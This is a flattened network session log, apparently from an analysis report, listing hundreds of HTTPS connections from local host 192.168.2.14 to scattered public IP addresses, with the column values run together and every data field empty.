                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13182192.168.2.144202058.41.20.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13183192.168.2.144200017.9.135.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13184192.168.2.145479044.136.1.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13185192.168.2.1457954189.146.254.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13186192.168.2.143706849.127.178.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13187192.168.2.1449982102.121.111.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13188192.168.2.1452190170.113.86.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13189192.168.2.1443424141.75.85.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13190192.168.2.1457428143.7.83.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13191192.168.2.144873476.29.89.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13192192.168.2.1449366199.64.241.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13193192.168.2.1446030219.184.139.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13194192.168.2.143707239.164.136.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13195192.168.2.145413834.23.105.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13196192.168.2.143758278.97.200.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13197192.168.2.1459222216.6.69.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13198192.168.2.1449448158.193.167.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13199192.168.2.1452744116.195.7.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13200192.168.2.144414045.214.239.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13201192.168.2.1444356208.49.80.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13202192.168.2.1443152150.143.52.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13203192.168.2.1444398141.51.43.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13204192.168.2.1440802150.3.169.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13205192.168.2.144230870.112.2.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13206192.168.2.1439712128.67.184.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13207192.168.2.1457124129.205.192.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13208192.168.2.145591257.106.106.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13209192.168.2.144247476.69.147.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13210192.168.2.1444732208.202.86.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13211192.168.2.144961472.221.183.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13212192.168.2.1453522154.29.75.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13213192.168.2.1455308146.164.39.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13214192.168.2.1438298169.253.127.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13215192.168.2.14526049.18.98.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13216192.168.2.143540068.85.152.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13217192.168.2.1433410168.66.80.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13218192.168.2.1438992101.199.235.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13219192.168.2.144678844.214.210.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13220192.168.2.143713278.162.197.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13221192.168.2.14419208.89.244.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13222192.168.2.1460458128.47.50.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13223192.168.2.145743683.211.34.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13224192.168.2.144789086.50.65.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13225192.168.2.1446176136.86.118.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13226192.168.2.143787484.49.91.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13227192.168.2.143557481.105.184.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13228192.168.2.143927434.234.34.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13229192.168.2.143560879.85.213.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13230192.168.2.143432459.116.68.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13231192.168.2.14491801.239.116.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13232192.168.2.1440964143.137.157.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13233192.168.2.143996673.16.77.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13234192.168.2.14456044.17.77.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13235192.168.2.1438470200.246.79.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13236192.168.2.145167038.143.7.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13237192.168.2.143554258.217.201.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13238192.168.2.145140664.147.68.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13239192.168.2.1452022130.33.96.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13240192.168.2.1445958219.58.254.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13241192.168.2.1433940131.212.24.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13242192.168.2.1432836159.142.6.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13243192.168.2.1451410145.48.105.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13244192.168.2.1435196154.227.103.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13245192.168.2.144060019.94.62.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13246192.168.2.1438518115.109.189.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13247192.168.2.145819071.57.202.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13248192.168.2.1451696139.171.39.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13249192.168.2.1452342121.94.213.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13250192.168.2.14404229.200.226.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13251192.168.2.144298076.241.102.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13252192.168.2.143403470.133.62.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13253192.168.2.145520854.71.73.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13254192.168.2.145447881.174.196.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13255192.168.2.1435994188.167.89.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13256192.168.2.1437636109.191.155.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13257192.168.2.144565049.246.155.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13258192.168.2.1455942146.96.215.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13259192.168.2.1460034181.194.221.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13260192.168.2.1432800220.165.103.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13261192.168.2.14421908.228.54.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13262192.168.2.1453278197.166.22.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13263192.168.2.145449423.169.14.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13264192.168.2.1453788161.5.57.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13265192.168.2.1446470211.99.29.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13266192.168.2.144779876.144.42.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13267192.168.2.1441878220.107.125.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13268192.168.2.143688845.145.23.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13269192.168.2.14461362.88.61.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13270192.168.2.143698479.162.168.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13271192.168.2.1446932189.111.118.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13272192.168.2.1453974208.73.53.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13273192.168.2.1460944203.39.84.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13274192.168.2.1439082222.197.224.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13275192.168.2.1440370209.86.104.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13276192.168.2.1432884163.46.132.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13277192.168.2.1443846145.83.69.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13278192.168.2.1458556148.223.191.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13279192.168.2.143695686.180.173.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13280192.168.2.143694632.129.31.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13281192.168.2.144797048.121.64.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13282192.168.2.144630252.195.32.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13283192.168.2.1437464208.225.125.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13284192.168.2.1435160100.44.125.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13285192.168.2.144611470.227.43.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13286192.168.2.144488246.126.232.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13287192.168.2.1453586210.218.0.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13288192.168.2.145616442.64.208.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13289192.168.2.1435112216.164.134.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13290192.168.2.14440205.4.80.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13291192.168.2.144238020.93.57.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13292192.168.2.143800670.179.225.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13293192.168.2.144245417.100.39.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13294192.168.2.1456450167.255.111.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13295192.168.2.1434904105.79.171.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13296192.168.2.1449444115.74.95.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13297192.168.2.1433546114.32.255.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13298192.168.2.14589541.94.222.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13299192.168.2.1433718132.234.155.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13300192.168.2.1454766125.72.25.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13301192.168.2.1435816137.96.77.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13302192.168.2.1444428191.95.129.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13303192.168.2.1449132108.168.22.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13304192.168.2.145825482.65.239.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13305192.168.2.1458402141.183.244.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13306192.168.2.1433128159.144.11.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13307192.168.2.1449386111.29.169.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13308192.168.2.1449570146.2.200.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13309192.168.2.1450368115.3.131.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13310192.168.2.1454400169.98.101.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13311192.168.2.1455570203.56.182.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13312192.168.2.1447660157.110.49.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13313192.168.2.1457006138.5.210.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13314192.168.2.1455864185.233.168.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13315192.168.2.1437372102.181.104.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13316192.168.2.144243636.139.133.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13317192.168.2.1454784132.222.10.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13318192.168.2.1444738125.67.173.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13319192.168.2.1455298180.36.141.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13320192.168.2.143717047.127.117.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13321192.168.2.1437314150.19.239.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13322192.168.2.1443490128.165.213.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13323192.168.2.144569435.52.120.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13324192.168.2.14477845.93.5.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13325192.168.2.144003291.9.167.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13326192.168.2.1437676196.231.88.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13327192.168.2.1433734120.71.201.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13328192.168.2.145322273.2.247.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13329192.168.2.1444902206.101.152.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13330192.168.2.1435224160.183.55.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13331192.168.2.1455606164.226.195.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13332192.168.2.1435822194.147.44.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13333192.168.2.145148069.146.254.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13334192.168.2.14601202.218.167.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13335192.168.2.1433620213.177.35.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13336192.168.2.1456254186.58.94.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13337192.168.2.1438964176.36.194.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13338192.168.2.1446732194.198.53.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13339192.168.2.144389074.248.48.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13340192.168.2.1444584176.155.154.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13341192.168.2.1447378103.6.171.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13342192.168.2.1444210179.92.234.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13343192.168.2.14467401.94.205.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13344192.168.2.144203474.86.45.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13345192.168.2.1444982139.82.239.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13346192.168.2.1447034100.154.33.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13347192.168.2.144875058.152.136.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13348192.168.2.144985265.233.104.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13349192.168.2.1443040140.228.149.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13350192.168.2.144474679.27.236.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13351192.168.2.1435018109.144.208.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13352192.168.2.1439190106.28.142.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13353192.168.2.144719470.145.136.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13354192.168.2.1437718200.166.221.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13355192.168.2.143770697.112.234.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13356192.168.2.1454796176.68.58.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13357192.168.2.143931453.9.227.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13358192.168.2.1459334117.48.240.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13359192.168.2.144855044.30.250.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13360192.168.2.145545451.166.143.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13361192.168.2.143817640.206.82.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13362192.168.2.1450868216.45.53.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13363192.168.2.1453660194.100.157.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13364192.168.2.146030466.211.101.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13365192.168.2.1436944174.70.40.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13366192.168.2.1440048219.181.155.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13367192.168.2.1442772107.143.46.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13368192.168.2.1454114213.34.39.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13369192.168.2.1450714178.28.87.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13370192.168.2.1438508213.63.90.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13371192.168.2.1444160148.62.2.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13372192.168.2.143656625.158.140.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13373192.168.2.145784268.110.48.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13374192.168.2.1434356212.30.41.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13375192.168.2.1435544204.19.121.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13376192.168.2.1433408134.35.7.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13377192.168.2.1449688193.55.92.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13378192.168.2.1436906154.230.17.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13379192.168.2.1456064114.103.38.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13380192.168.2.143583468.249.201.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13381192.168.2.144438819.177.88.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13382192.168.2.1459156144.174.152.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13383192.168.2.1433020146.210.147.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13384192.168.2.1450410135.161.9.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13385192.168.2.14377444.84.240.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13386192.168.2.144510648.55.132.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13387192.168.2.145212049.170.141.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13388192.168.2.14541769.155.206.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13389192.168.2.1452566218.137.185.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13390192.168.2.145322637.239.246.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13391192.168.2.1456412193.126.218.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13392192.168.2.144088295.30.216.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13393192.168.2.1457678194.236.101.18443
                                                        TimestampBytes transferredDirectionData


